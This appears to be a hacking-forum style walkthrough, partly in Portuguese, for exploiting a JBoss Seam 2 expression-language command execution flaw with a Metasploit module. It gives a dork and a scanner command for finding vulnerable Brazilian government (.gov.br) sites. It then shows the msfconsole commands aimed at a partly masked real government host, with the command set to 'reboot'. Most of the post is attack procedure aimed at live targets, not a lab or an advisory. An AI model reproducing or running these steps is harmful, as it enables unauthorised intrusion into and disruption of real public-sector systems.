JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

• MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec

• COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6

• DORK:site:.gov.br inurl:.seam  intitle:"JBoss Seam Debug"

Configuração:

• CMD  - The command to execute.
• RHOST - The target address
• RPORT  - The target port
• TARGETURI - Target URI

msf > use auxiliary/admin/http/jboss_seam_exec

msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br

msf auxiliary(jboss_seam_exec) > set RPORT 80

msf auxiliary(jboss_seam_exec) > set CMD reboot

msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam

msf auxiliary(jboss_seam_exec) > exploit

Output:

Resultado:

VÍDEO:



REFERENCE: http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec
SCANNER INURLBR: http://github.com/googleinurl/SCANNER-INURLBR